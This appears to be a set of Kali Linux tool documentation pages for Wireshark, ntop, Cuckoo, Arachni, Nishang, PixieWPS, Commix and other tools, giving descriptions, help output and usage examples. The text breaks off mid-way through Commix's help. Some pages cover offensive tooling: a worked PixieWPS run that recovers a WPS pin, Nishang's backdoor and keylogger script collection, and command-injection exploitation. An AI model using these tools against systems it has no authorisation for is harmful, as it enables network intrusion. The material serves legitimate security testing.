Arachni

February 19, 2014, 11:10 am

≫ Next: BlueMaho

$

0

0

Arachni Package Description

Arachni is an Open Source, feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.

It is smart, it trains itself by learning from the HTTP responses it receives during the audit process and is able to perform meta-analysis using a number of factors in order to correctly assess the trustworthiness of results and intelligently identify false-positives.

It is versatile enough to cover a great deal of use cases, ranging from a simple command line scanner utility, to a global high performance grid of scanners, to a Ruby library allowing for scripted audits, to a multi-user multi-scan web collaboration platform.

Source: http://arachni-scanner.com/

Arachni Homepage | Kali Arachni Repo

• Author: Tasos “Zapotek” Lasko
• License: Apache-2.0

Tools included in the arachni package

arachni_web – The Arachni web scanner

root@kali:~# arachni_web -h
Usage: rackup [ruby options] [rack options] [rackup config]

Ruby options:
  -e, --eval LINE          evaluate a LINE of code
  -b BUILDER_LINE,         evaluate a BUILDER_LINE of code as a builder script
      --builder
  -d, --debug              set debugging flags (set $DEBUG to true)
  -w, --warn               turn warnings on for your script
  -I, --include PATH       specify $LOAD_PATH (may be used more than once)
  -r, --require LIBRARY    require the library, before executing your script

Rack options:
  -s, --server SERVER      serve using SERVER (thin/puma/webrick/mongrel)
  -o, --host HOST          listen on HOST (default: 0.0.0.0)
  -p, --port PORT          use PORT (default: 9292)
  -O NAME[=VALUE],         pass VALUE to the server as option NAME. If no VALUE, sets it to true. Run '/usr/share/arachni/bin/../system/gems/bin/rackup -s SERVER -h' to get a list of options for SERVER
      --option
  -E, --env ENVIRONMENT    use ENVIRONMENT for defaults (default: development)
  -D, --daemonize          run daemonized in the background
  -P, --pid FILE           file to store PID (default: rack.pid)

Common options:
  -h, -?, --help           Show this message
      --version            Show version

arachni_web Usage Example

root@kali:~# arachni_web
>> Thin web server (v1.5.1 codename Straight Razor)
>> Maximum connections set to 1024
>> Listening on 0.0.0.0:9292, CTRL+C to stop

---

BlueMaho

February 19, 2014, 11:10 am

≫ Next: Capstone

≪ Previous: Arachni

$

0

0

BlueMaho Package Description

BlueMaho is GUI-shell (interface) for suite of tools for testing security of bluetooth devices. It is freeware, opensource, written on python, uses wxPyhon. It can be used for testing BT-devices for known vulnerabilities and major thing to do – testing to find unknown vulns. Also it can form nice statistics.

Features:

• scan for devices, show advanced info, SDP records, vendor etc
• track devices – show where and how much times device was seen, its name changes
• loop scan – it can scan all time, showing you online devices
• alerts with sound if new device found
• on_new_device – you can spacify what command should it run when it founds new device
• it can use separate dongles – one for scaning (loop scan) and one for running tools or exploits
• send files
• change name, class, mode, BD_ADDR of local HCI devices
• save results in database
• form nice statistics (uniq devices by day/hour, vendors, services etc)
• test remote device for known vulnerabilities (see exploits for more details)
• test remote device for unknown vulnerabilities (see tools for more details)
• themes! you can customize it

Source: https://wiki.thc.org/BlueMaho

BlueMaho Homepage | Kali BlueMaho Repo

• Author: The Hacker’s Choice
• License: GPLv2

Tools included in the bluemaho package

bluemaho.py – Suite of tools for testing security of bluetooth devices

BlueMaho is GUI-shell (interface) for suite of tools for testing security of bluetooth devices. It is freeware, opensource, written on python, uses wxPyhon. It can be used for testing BT-devices for known vulnerabilities and major thing to do – testing to find unknown vulns. Also it can form nice statistics.

bluemaho.py Usage Example

root@kali:~# bluemaho.py

Capstone

February 19, 2014, 11:11 am

≫ Next: CaseFile

≪ Previous: BlueMaho

$

0

0

Capstone Package Description

Capstone is a disassembly framework with the target of becoming the ultimate disasm engine for binary analysis and reversing in the security community. Created by Nguyen Anh Quynh, then developed and maintained by a small community, Capstone offers some unparalleled features:

• Support multiple hardware architectures: ARM, ARM64 (aka ARMv8), Mips & X86
• Having clean/simple/lightweight/intuitive architecture-neutral API
• Provide details on disassembled instruction (called “decomposer” by others)
• Provide semantics of the disassembled instruction, such as list of implicit registers read & written
• Implemented in pure C language, with lightweight wrappers for C++, Python, Ruby, OCaml, C#, Java and Go available
• Native support for Windows & *nix platforms (MacOSX, Linux & *BSD confirmed)
• Thread-safe by design.

Source: http://www.capstone-engine.org/index.html

Capstone Homepage | Kali Capstone Repo

• Author: COSEINC , Nguyen Anh Quynh
• License: BSD

capstone Usage Example

root@kali:~# coming soon

CaseFile

February 19, 2014, 11:12 am

≫ Next: Cuckoo

≪ Previous: Capstone

$

0

0

CaseFile Package Description

CaseFile is the little brother to Maltego. It targets a unique market of ‘offline’ analysts whose primary sources of information are not gained from the open-source intelligence side or can be programmatically queried. We see these people as investigators and analysts who are working ‘on the ground’, getting intelligence from other people in the team and building up an information map of their investigation.

CaseFile gives you the ability to quickly add, link and analyze data having the same graphing flexibility and performance as Maltego without the use of transforms. CaseFile is roughly a third of the price of Maltego.

What does CaseFile do?

CaseFile is a visual intelligence application that can be used to determine the relationships and real world links between hundreds of different types of information.
It gives you the ability to quickly view second, third and n-th order relationships and find links otherwise undiscoverable with other types of intelligence tools.
CaseFile comes bundled with many different types of entities that are commonly used in investigations allowing you to act quickly and efficiently. CaseFile also has the ability to add custom entity types allowing you to extend the product to your own data sets.

What can CaseFile do for me?

CaseFile can be used for the information gathering, analytics and intelligence phases of almost all types of investigates, from IT Security, Law enforcement and any data driven work. It will save you time and will allow you to work more accurately and smarter.
CaseFile has the ability to visualise datasets stored in CSV, XLS and XLSX spreadsheet formats.
We are not marketing people. Sorry.
CaseFile aids you in your thinking process by visually demonstrating interconnected links between searched items.
If access to “hidden” information determines your success, CaseFile can help you discover it.

Source: http://paterva.com/web6/products/casefile.php

CaseFile Homepage | Kali CaseFile Repo

• Author: Paterva
• License: Commercial

Tools included in the casefile package

casefile – Offline intelligence tool

CaseFile gives you the ability to quickly add, link and analyze data having the same graphing flexibility and performance as Maltego without the use of transforms.

casefile Usage Example

root@kali:~# casefile

Cuckoo

February 19, 2014, 11:12 am

≫ Next: ntop

≪ Previous: CaseFile

$

0

0

Cuckoo Package Description

Cuckoo Sandbox is a malware analysis system. You can throw any suspicious file at it and in a matter of seconds Cuckoo will provide you back some detailed results outlining what such file did when executed inside an isolated environment.

Cuckoo generates a handful of different raw data which include:

• Native functions and Windows API calls traces
• Copies of files created and deleted from the filesystem
• Dump of the memory of the selected process
• Full memory dump of the analysis machine
• Screenshots of the desktop during the execution of the malware analysis
• Network dump generated by the machine used for the analysis.

In order to make such results more consumable to the end users, Cuckoo is able to process them and generate different type of reports, which could include:

• JSON report
• HTML report
• MAEC report
• MongoDB interface
• HPFeeds interface

Source: http://www.cuckoosandbox.org/about.html

Cuckoo Homepage | Kali Cuckoo Repo

• Author: Cuckoo Sandbox Developers
• License: GPLv3

Tools included in the cuckoo package

cuckoo.py – Automated malware analysis system

The Cuckoo Sandbox.

Cuckoo Usage Example

root@kali:~# coming soon

ntop

February 19, 2014, 11:25 am

≫ Next: RTLSDR Scanner

≪ Previous: Cuckoo

$

0

0

ntop Package Description

ntop is a tool that shows the network usage, similar to what the popular top Unix command does. ntop is based on pcapture (ftp://ftp.ee.lbl.gov/pcapture.tar.Z) and it has been written in a portable way in order to virtually run on every Unix platform.

ntop can be used in both interactive or web mode. In the first case, ntop displays the network status on the user’s terminal whereas in web mode a web browser (e.g. netscape) can attach to ntop (that acts as a web server) and get a dump of the network status. In the latter case, ntop can be seen as a simple RMON-like agent with an embedded web interface.

ntop uses libpcap, a system-independent interface for user-level packet capture.
Source: ntop README

ntop Homepage | Kali ntop Repo

• Author: Luca Deri
• License: GPLv2

Tools included in the ntop package

ntop – display network usage in web browser

root@kali:~# ntop -h
Welcome to ntop v.4.99.3 (32 bit)
[Configured on Mar  2 2013  6:00:33, built on Mar  2 2013 06:01:55]
Copyright 1998-2012 by Luca Deri <deri@ntop.org>

Get the freshest ntop from http://www.ntop.org/

Usage: ntop [OPTION]

Basic options:
    [-h             | --help]                             Display this help and exit
    [-u <user>      | --user <user>]                      Userid/name to run ntop under (see man page)
    [-t <number>    | --trace-level <number>]             Trace level [0-6]
    [-P <path>      | --db-file-path <path>]              Path for ntop internal database files
    [-Q <path>      | --spool-file-path <path>]           Path for ntop spool files
    [-w <port>      | --http-server <port>]               Web server (http:) port (or address:port) to listen on

Advanced options:
    [-4             | --ipv4]                             Use IPv4 connections
    [-6             | --ipv6]                             Use IPv6 connections
    [-a <file>      | --access-log-file <file>]           File for ntop web server access log
    [-b             | --disable-decoders]                 Disable protocol decoders
    [-c             | --sticky-hosts]                     Idle hosts are not purged from memory
    [-d             | --daemon]                           Run ntop in daemon mode
    [-e <number>    | --max-table-rows <number>]          Maximum number of table rows to report
    [-f <file>      | --traffic-dump-file <file>]         Traffic dump file (see tcpdump)
    [-g             | --track-local-hosts]                Track only local hosts
    [-i <name>      | --interface <name>]                 Interface name or names to monitor
    [-j             | --create-other-packets]             Create file ntop-other-pkts.XXX.pcap file
    [-l <path>      | --pcap-log <path>]                  Dump packets captured to a file (debug only!)
    [-m <addresses> | --local-subnets <addresses>]        Local subnetwork(s) (see man page)
    [-n <mode>      | --numeric-ip-addresses <mode>]      Numeric IP addresses DNS resolution mode:
                                                          0 - No DNS resolution at all
                                                          1 - DNS resolution for local hosts only
                                                          2 - DNS resolution for remote hosts only
    [-p <list>      | --protocols <list>]                 List of IP protocols to monitor (see man page)
    [-q             | --create-suspicious-packets]        Create file ntop-suspicious-pkts.XXX.pcap file
    [-r <number>    | --refresh-time <number>]            Refresh time in seconds, default is 120
    [-s             | --no-promiscuous]                   Disable promiscuous mode
    [-x <max num hash entries> ]                          Max num. hash entries ntop can handle (default 8192)
    [-z             | --disable-sessions]                 Disable TCP session tracking
    [-A]                                                  Ask admin user password and exit
    [               | --set-admin-password=<pass>]        Set password for the admin user to <pass>
    [               | --w3c]                              Add extra headers to make better html
    [-B <filter>]   | --filter-expression                 Packet filter expression, like tcpdump (for all interfaces)
                                                          You can also set per-interface filter:
                                                          eth0=tcp,eth1=udp ....
    [-C <rate>]     | --sampling-rate                     Packet capture sampling rate [default: 1 (no sampling)]
    [-D <name>      | --domain <name>]                    Internet domain name
    [-F <spec>      | --flow-spec <specs>]                Flow specs (see man page)
    [-K             | --enable-debug]                     Enable debug mode
    [-L]                                                  Do logging via syslog
    [               | --use-syslog=<facility>]            Do logging via syslog, facility ('=' is REQUIRED)
    [-M             | --no-interface-merge]               Don't merge network interfaces (see man page)
    [-O <path>      | --pcap-file-path <path>]            Path for log files in pcap format
    [-U <URL>       | --mapper <URL>]                     URL (mapper.pl) for displaying host location
    [-V             | --version]                          Output version information and exit
    [-X <max num TCP sessions> ]                          Max num. TCP sessions ntop can handle (default 32768)
    [--disable-instantsessionpurge]                       Disable instant FIN session purge
    [--disable-mutexextrainfo]                            Disable extra mutex info
    [--disable-stopcap]                                   Capture packets even if there's no memory left
    [--disable-ndpi]                                      Disable nDPI for protocol discovery
    [--disable-python]                                    Disable Python interpreter
    [--instance <name>]                                   Set log name for this ntop instance
    [--p3p-cp]                                            Set return value for p3p compact policy, header
    [--p3p-uri]                                           Set return value for p3p policyref header
    [--skip-version-check]                                Skip ntop version check
    [--known-subnets <networks>]                          List of known subnets (separated by ,)
                                                          If the argument starts with @ it is assumed it is a file path
                                                          E.g. 192.168.0.0/14=home,172.16.0.0/16=private

NOTE
    * You can configure further ntop options via the web
      interface [Menu Admin -> Config].
    * The command line options are not permanent, i.e. they
      are not persistent across ntop initializations.

ntop Usage Example

Display network usage, filtering for a specific IP address (-B “src host 192.168.1.1″):

root@kali:~# ntop -B "src host 192.168.1.1"

RTLSDR Scanner

February 19, 2014, 11:26 am

≫ Next: Wireshark

≪ Previous: ntop

$

0

0

RTLSDR Scanner Package Description

A cross platform Python frequency scanning GUI for USB TV dongles, using the OsmoSDR rtl-sdr library.
In other words a cheap, simple Spectrum Analyser.
The scanner attempts to overcome the tuner’s frequency response by averaging scans from both the positive and negative frequency offets of the baseband data.

Source: http://eartoearoak.com/software/rtlsdr-scanner

RTLSDR Scanner Homepage | Kali RTLSDR Scanner Repo

• Author: Al Brown
• License: GPLv3

Tools included in the rtlsdr-scanner package

rtlsdr-scanner – Python frequency scanning GUI for the OsmoSDR rtl-sdr library

root@kali:~# rtlsdr-scanner -h
usage: rtlsdr_scan.py [-h] [file]

positional arguments:
  file        plot filename

optional arguments:
  -h, --help  show this help message and exit

rtlsdr-scanner Usage Example

root@kali:~# rtlsdr-scanner

Wireshark

February 19, 2014, 11:30 am

≫ Next: Nishang

≪ Previous: RTLSDR Scanner

$

0

0

wireshark Package Description

Wireshark is the world’s foremost network protocol analyzer. It lets you see what’s happening on your network at a microscopic level. It is the de facto (and often de jure) standard across many industries and educational institutions. Wireshark development thrives thanks to the contributions of networking experts across the globe. It is the continuation of a project that started in 1998.

Wireshark has a rich feature set which includes the following:

• Deep inspection of hundreds of protocols, with more being added all the time
• Live capture and offline analysis
• Standard three-pane packet browser
• Multi-platform: Runs on Windows, Linux, OS X, Solaris, FreeBSD, NetBSD, and many others
• Captured network data can be browsed via a GUI, or via the TTY-mode TShark utility
• The most powerful display filters in the industry
• Rich VoIP analysis
• Capture files compressed with gzip can be decompressed on the fly
• Live data can be read from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, FDDI, and others (depending on your platform)
• Coloring rules can be applied to the packet list for quick, intuitive analysis
• Output can be exported to XML, PostScript®, CSV, or plain text
• Decryption support for many protocols, including IPsec, ISAKMP, Kerberos, SNMPv3, SSL/TLS, WEP, and WPA/WPA2
• Read/write many different capture file formats: tcpdump (libpcap), Pcap NG, Catapult DCT2000, Cisco Secure IDS iplog, Microsoft Network Monitor, Network * General Sniffer® (compressed and uncompressed), Sniffer® Pro, and NetXray®, Network Instruments Observer, NetScreen snoop, Novell LANalyzer, RADCOM WAN/LAN Analyzer, Shomiti/Finisar Surveyor, Tektronix K12xx, Visual Networks Visual UpTime, WildPackets EtherPeek/TokenPeek/AiroPeek, and many others

Source: http://www.wireshark.org/about.html

Wireshark Homepage | Kali Wireshark Repo

• Author: Gerald Combs and contributors
• License: GPLv2

Tools included in the wireshark package

wireshark – network traffic analyzer – GTK+ version

root@kali:~# wireshark -h
Wireshark 1.10.2 (SVN Rev 51934 from /trunk-1.10)
Interactively dump and analyze network traffic.
See http://www.wireshark.org for more information.

Copyright 1998-2013 Gerald Combs <gerald@wireshark.org> and contributors.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

Usage: wireshark [options] ... [ <infile> ]

Capture interface:
  -i <interface>           name or idx of interface (def: first non-loopback)
  -f <capture filter>      packet filter in libpcap filter syntax
  -s <snaplen>             packet snapshot length (def: 65535)
  -p                       don't capture in promiscuous mode
  -k                       start capturing immediately (def: do nothing)
  -S                       update packet display when new packets are captured
  -l                       turn on automatic scrolling while -S is in use
  -I                       capture in monitor mode, if available
  -B <buffer size>         size of kernel buffer (def: 2MB)
  -y <link type>           link layer type (def: first appropriate)
  -D                       print list of interfaces and exit
  -L                       print list of link-layer types of iface and exit

Capture stop conditions:
  -c <packet count>        stop after n packets (def: infinite)
  -a <autostop cond.> ...  duration:NUM - stop after NUM seconds
                           filesize:NUM - stop this file after NUM KB
                              files:NUM - stop after NUM files
Capture output:
  -b <ringbuffer opt.> ... duration:NUM - switch to next file after NUM secs
                           filesize:NUM - switch to next file after NUM KB
                              files:NUM - ringbuffer: replace after NUM files
Input file:
  -r <infile>              set the filename to read from (no pipes or stdin!)

Processing:
  -R <read filter>         packet filter in Wireshark display filter syntax
  -n                       disable all name resolutions (def: all enabled)
  -N <name resolve flags>  enable specific name resolution(s): "mntC"

User interface:
  -C <config profile>      start with specified configuration profile
  -Y <display filter>      start with the given display filter
  -g <packet number>       go to specified packet number after "-r"
  -J <jump filter>         jump to the first packet matching the (display)
                           filter
  -j                       search backwards for a matching packet after "-J"
  -m <font>                set the font name used for most text
  -t a|ad|d|dd|e|r|u|ud    output format of time stamps (def: r: rel. to first)
  -u s|hms                 output format of seconds (def: s: seconds)
  -X <key>:<value>         eXtension options, see man page for details
  -z <statistics>          show various statistics, see man page for details

Output:
  -w <outfile|->           set the output filename (or '-' for stdout)

Miscellaneous:
  -h                       display this help and exit
  -v                       display version info and exit
  -P <key>:<path>          persconf:path - personal configuration files
                           persdata:path - personal data files
  -o <name>:<value> ...    override preference or recent setting
  -K <keytab>              keytab file to use for kerberos decryption
  --display=DISPLAY        X display to use

tshark – network traffic analyzer – console version

root@kali:~# tshark -h
TShark 1.10.2 (SVN Rev 51934 from /trunk-1.10)
Dump and analyze network traffic.
See http://www.wireshark.org for more information.

Copyright 1998-2013 Gerald Combs <gerald@wireshark.org> and contributors.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

Usage: tshark [options] ...

Capture interface:
  -i <interface>           name or idx of interface (def: first non-loopback)
  -f <capture filter>      packet filter in libpcap filter syntax
  -s <snaplen>             packet snapshot length (def: 65535)
  -p                       don't capture in promiscuous mode
  -I                       capture in monitor mode, if available
  -B <buffer size>         size of kernel buffer (def: 2MB)
  -y <link type>           link layer type (def: first appropriate)
  -D                       print list of interfaces and exit
  -L                       print list of link-layer types of iface and exit

Capture stop conditions:
  -c <packet count>        stop after n packets (def: infinite)
  -a <autostop cond.> ...  duration:NUM - stop after NUM seconds
                           filesize:NUM - stop this file after NUM KB
                              files:NUM - stop after NUM files
Capture output:
  -b <ringbuffer opt.> ... duration:NUM - switch to next file after NUM secs
                           filesize:NUM - switch to next file after NUM KB
                              files:NUM - ringbuffer: replace after NUM files
Input file:
  -r <infile>              set the filename to read from (no pipes or stdin!)

Processing:
  -2                       perform a two-pass analysis
  -R <read filter>         packet Read filter in Wireshark display filter syntax
  -Y <display filter>      packet displaY filter in Wireshark display filter syntax
  -n                       disable all name resolutions (def: all enabled)
  -N <name resolve flags>  enable specific name resolution(s): "mntC"
  -d <layer_type>==<selector>,<decode_as_protocol> ...
                           "Decode As", see the man page for details
                           Example: tcp.port==8888,http
  -H <hosts file>          read a list of entries from a hosts file, which will
                           then be written to a capture file. (Implies -W n)
Output:
  -w <outfile|->           write packets to a pcap-format file named "outfile"
                           (or to the standard output for "-")
  -C <config profile>      start with specified configuration profile
  -F <output file type>    set the output file type, default is pcapng
                           an empty "-F" option will list the file types
  -V                       add output of packet tree        (Packet Details)
  -O <protocols>           Only show packet details of these protocols, comma
                           separated
  -P                       print packet summary even when writing to a file
  -S <separator>           the line separator to print between packets
  -x                       add output of hex and ASCII dump (Packet Bytes)
  -T pdml|ps|psml|text|fields
                           format of text output (def: text)
  -e <field>               field to print if -Tfields selected (e.g. tcp.port, col.Info);
                           this option can be repeated to print multiple fields
  -E<fieldsoption>=<value> set options for output when -Tfields selected:
     header=y|n            switch headers on and off
     separator=/t|/s|<char> select tab, space, printable character as separator
     occurrence=f|l|a      print first, last or all occurrences of each field
     aggregator=,|/s|<char> select comma, space, printable character as
                           aggregator
     quote=d|s|n           select double, single, no quotes for values
  -t a|ad|d|dd|e|r|u|ud    output format of time stamps (def: r: rel. to first)
  -u s|hms                 output format of seconds (def: s: seconds)
  -l                       flush standard output after each packet
  -q                       be more quiet on stdout (e.g. when using statistics)
  -Q                       only log true errors to stderr (quieter than -q)
  -g                       enable group read access on the output file(s)
  -W n                     Save extra information in the file, if supported.
                           n = write network address resolution information
  -X <key>:<value>         eXtension options, see the man page for details
  -z <statistics>          various statistics, see the man page for details

Miscellaneous:
  -h                       display this help and exit
  -v                       display version info and exit
  -o <name>:<value> ...    override preference setting
  -K <keytab>              keytab file to use for kerberos decryption
  -G [report]              dump one of several available reports and exit
                           default report="fields"
                           use "-G ?" for more help

tshark Usage Example

root@kali:~# tshark -f "tcp port 80" -i eth0

wireshark Usage Example

root@kali:~# wireshark

---

Nishang

June 4, 2014, 9:54 am

≫ Next: Parsero

≪ Previous: Wireshark

$

0

0

nishang Package Description

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and post exploitation during Penetraion Tests. The scripts are written on the basis of requirement by the author during real Penetration Tests.

It contains many interesting scripts like Keylogger, DNS TXT Code Execution, HTTP Backdoor, Powerpreter, LSA Secrets and much more.

Source: https://github.com/samratashok/nishang

Nishang Homepage | Kali Webshells Repo

• Author: samratashok
• License: None

webshells Directory

root@kali:~# ls -l /usr/share/nishang/
total 48
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Antak-WebShell
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Backdoors
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Escalation
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Execution
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Gather
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Misc
-rw-r--r-- 1 root root  495 Jun  4 11:14 nishang.psm1
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Pivot
drwxr-xr-x 2 root root 4096 Jun  4 11:15 powerpreter
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Prasadhak
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Scan
drwxr-xr-x 2 root root 4096 Jun  4 11:15 Utility

Parsero

June 9, 2014, 11:52 am

≫ Next: PixieWPS

≪ Previous: Nishang

$

0

0

Parsero Package Description

Parsero is a free script written in Python which reads the Robots.txt file of a web server and looks at the Disallow entries. The Disallow entries tell the search engines what directories or files hosted on a web server mustn’t be indexed. For example, “Disallow: /portal/login” means that the content on www.example.com/portal/login it’s not allowed to be indexed by crawlers like Google, Bing, Yahoo… This is the way the administrator have to not share sensitive or private information with the search engines.

But sometimes these paths typed in the Disallows entries are directly accessible by the users without using a search engine, just visiting the URL and the Path, and sometimes they are not available to be visited by anybody… Because it is really common that the administrators write a lot of Disallows and some of them are available and some of them are not, you can use Parsero in order to check the HTTP status code of each Disallow entry in order to check automatically if these directories are available or not.

Also, the fact the administrator write a robots.txt, it doesn’t mean that the files or directories typed in the Dissallow entries will not be indexed by Bing, Google, Yahoo… For this reason, Parsero is capable of searching in Bing to locate content indexed without the web administrator authorization. Parsero will check the HTTP status code in the same way for each Bing result.

Source: https://github.com/behindthefirewalls/Parsero

Parsero Homepage | Kali parsero Repo

• Author: Javier Nieto
• License: GPLv2

Tools included in the parsero package

parsero – robots.txt audit tool

root@kali:~# parsero -h

          ____
         |  _ \ __ _ _ __ ___  ___ _ __ ___
         | |_) / _` | '__/ __|/ _ \ '__/ _ \
         |  __/ (_| | |  \__ \  __/ | | (_) |
         |_|   \__,_|_|  |___/\___|_|  \___/

usage: parsero [-h] [-u URL] [-o] [-sb]

optional arguments:
  -h, --help  show this help message and exit
  -u URL      Type the URL which will be analyzed
  -o          Show only the "HTTP 200" status code
  -sb         Search in Bing indexed Disallows

parsero Usage Example

Search for results from a website (-u www.bing.com) using Bing indexed Disallows (-sb):

root@kali:~# parsero -u www.bing.com -sb

      ____                              
     |  _ \ __ _ _ __ ___  ___ _ __ ___  
     | |_) / _` | '__/ __|/ _ \ '__/ _ \
     |  __/ (_| | |  \__ \  __/ | | (_) |
     |_|   \__,_|_|  |___/\___|_|  \___/

Starting Parsero v0.75 (https://github.com/behindthefirewalls/Parsero) at 06/09/14 12:48:25
Parsero scan report for www.bing.com
http://www.bing.com/travel/secure 301 Moved Permanently
http://www.bing.com/travel/flight/flightSearchAction 301 Moved Permanently
http://www.bing.com/travel/css 301 Moved Permanently
http://www.bing.com/results 404 Not Found
http://www.bing.com/spbasic 404 Not Found
http://www.bing.com/entities/search 302 Found
http://www.bing.com/translator/? 200 OK
http://www.bing.com/Proxy.ashx 404 Not Found
http://www.bing.com/images/search? 200 OK
http://www.bing.com/travel/hotel/hotelSearch 301 Moved Permanently
http://www.bing.com/static/ 404 Not Found
http://www.bing.com/offers/proxy/dealsserver/api/log 405 Method Not Allowed
http://www.bing.com/shenghuo 301 Moved Permanently
http://www.bing.com/widget/render 200 OK

PixieWPS

April 30, 2015, 7:38 am

≫ Next: Commix

≪ Previous: Parsero

$

0

0

PixieWPS Package Description

Pixiewps is a tool written in C used to bruteforce offline the WPS pin exploiting the low or non-existing entropy of some APs (pixie dust attack). It is meant for educational purposes only. All credits for the research go to Dominique Bongard.

Features:

• Checksum optimization: it’ll try first for valid PINs (11’000);
• Reduced entropy of the seed from 32 to 25 bits for the C LCG pseudo-random function;
• Small Diffie-Hellman keys: don’t need to specify the Public Registrar Key if the same option is used with Reaver.

The program will also try first with E-S0 = E-S1 = 0, then it’ll tries to bruteforce the seed of the PRNG if the –e-nonce option is specificed.

Source: https://forums.kali.org/showthread.php?25018-Pixiewps-wps-pixie-dust-attack-tool

PixieWPS Homepage | Kali PixieWPS Repo
Kali Forum Thread | Community Research Thread

• Author: wiire
• License: GPLv3

Tools included in the PixieWPS package

PixieWPS – Offline attack for WPS pin

root@kali:~# pixiewps -h

 Pixiewps made by wiire

 Usage: pixiewps <arguments>

 Required Arguments:

    -e, --pke      : Enrollee public key
    -r, --pkr      : Registrar public key
    -s, --e-hash1  : E-Hash1
    -z, --e-hash2  : E-Hash2
    -a, --authkey  : Key used in HMAC SHA-256

 Optional Arguments:

    -n, --e-nonce  : Enrollee nonce
    -S, --dh-small : Small Diffie-Hellman keys (--pkr not needed)

    -h, --help     : Display this usage screen

root@kali:~#

PixieWPS Usage Example

root@kali:~# pixiewps \
>    -a 7f:de:11:b9:69:1c:de:26:4a:21:a4:6f:eb:3d:b8:aa:aa:d7:30:09:09:32:b8:24:43:9b:e0:91:78:e7:6f:2c \
>    -e d4:38:91:0d:4e:6e:15:fe:70:f0:97:a8:70:2a:b8:94:f5:75:74:bf:64:19:9f:92:82:9b:e0:2c:c0:a3:75:48:08:8f:63:0a:82:37:0c:b7:95:42:cf:55:ca:a5:f0:f7:6c:b2:c7:5f:0e:23:18:44:f4:2d:00:f1:da:d4:94:23:56:c7:2c:b0:f6:87:c7:77:d0:cc:11:35:cf:b7:4f:bc:44:8d:ca:35:8a:78:3d:99:7f:2b:cf:44:21:d8:e2:0f:3c:7d:a4:72:c8:03:6f:77:2a:e9:fa:c1:e9:a8:2c:74:65:99:5a:e0:a5:26:d9:23:5e:4e:ec:5a:07:07:ab:80:db:3f:5f:18:7f:fa:fa:f1:57:74:b2:8d:a9:97:a6:c6:0a:a5:e0:ec:93:09:23:67:f6:3e:ec:1f:55:32:a4:5d:73:8f:ab:91:74:cf:1d:79:85:12:c1:81:f5:ea:a6:68:9d:8e:c7:c6:be:01:dc:d9:f8:68:80:11:55:d7:44:6a \
>    -r bc:ad:54:2f:88:44:7c:12:69:ef:34:31:4a:17:1c:92:b1:d7:06:4c:73:be:9f:d3:ed:87:63:74:10:46:0f:46:8c:36:b5:d4:a0:ba:af:85:9c:b2:30:42:d7:59:43:75:5a:d7:79:96:fb:ee:7b:66:db:b7:a8:f9:22:9c:a5:d3:b8:e7:c0:c4:5c:58:34:1f:56:a8:1a:41:a8:d2:e8:f6:3e:c9:3a:93:d9:9b:59:5c:a8:e0:78:84:6c:fc:05:e8:76:a3:e6:3b:33:94:4a:a9:ff:50:fb:60:fa:97:3b:6d:cc:04:f1:5e:36:24:a9:06:7a:f8:6b:00:e9:71:9d:89:be:9c:b2:9c:1f:ca:6d:d6:4d:ab:46:3d:b3:11:1f:8d:40:f7:c8:a4:39:48:c5:ca:1b:f6:30:95:7d:d9:68:41:ef:0a:37:b2:4a:37:e4:a4:b0:dd:7e:c1:af:3e:66:ea:bf:16:0a:7a:8a:05:00:01:a4:29:77:a9:d4:81:d4:0e \
>    -s 90:5f:f5:7d:93:e5:c4:3c:62:0d:26:65:dd:59:57:d5:ba:ba:f1:b7:30:91:72:7c:54:94:38:08:1e:13:35:38 \
>    -z b0:2b:07:50:28:e7:6e:5f:fa:27:1b:31:92:85:43:cb:c5:6a:ec:73:e2:27:c3:b9:80:ec:5b:ed:88:f0:1e:ec

 [*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
 [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
 [*] PSK1: d4:eb:0c:2a:38:15:e1:a0:3d:70:db:74:31:eb:53:a3
 [*] PSK2: d3:b7:e6:23:f3:1d:22:0a:23:ea:07:bb:7f:76:65:8b
 [+] WPS pin: 04847533

 [*] Time taken: 0 s

root@kali:~#

Commix

February 1, 2016, 11:58 am

≫ Next: hostapd-wpe

≪ Previous: PixieWPS

$

0

0

Commix Package Description

Commix (short for [comm]and [i]njection e[x]ploiter) has a simple environment and it can be used, from web developers, penetration testers or even security researchers to test web applications with the view to find bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or string. Commix is written in Python programming language.

Source: https://github.com/stasinopoulos/commix
Commix Homepage | Kali Commix Repo | Kali Commix Package

• Author: Anastasios Stasinopoulos
• License: GPLv3

Tools included in the Commix package

Commix – Automated All-in-One OS Command Injection and Exploitation Tool

root@kali:~# commix
                                       __          
   ___    ___     ___ ___     ___ ___ /\_\   __  _  
  /'___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\  
 /\ \__//\ \L\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/>  </  
 \ \____\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\ \_\/\_/\_\
  \/____/\/___/  \/_/\/_/\/_/\/_/\/_/\/_/\/_/\//\/_/ { v0.3b-nongit-20160104 }

+--
Automated All-in-One OS Command Injection and Exploitation Tool
Copyright (c) 2014-2015 Anastasios Stasinopoulos (@ancst)
+--

Usage: python commix.py [options]

Options:
  -h, --help            Show help and exit.

  General:
    These options relate to general matters.

    --verbose           Enable the verbose mode.
    --version           Show version number and exit.
    --output-dir=OUT..  Set custom output directory path.

  Target:
    This options has to be provided, to define the target URL.

    --url=URL           Target URL.
    --url-reload        Reload target URL after command execution.

  Request:
    These options can be used to specify how to connect to the target URL.

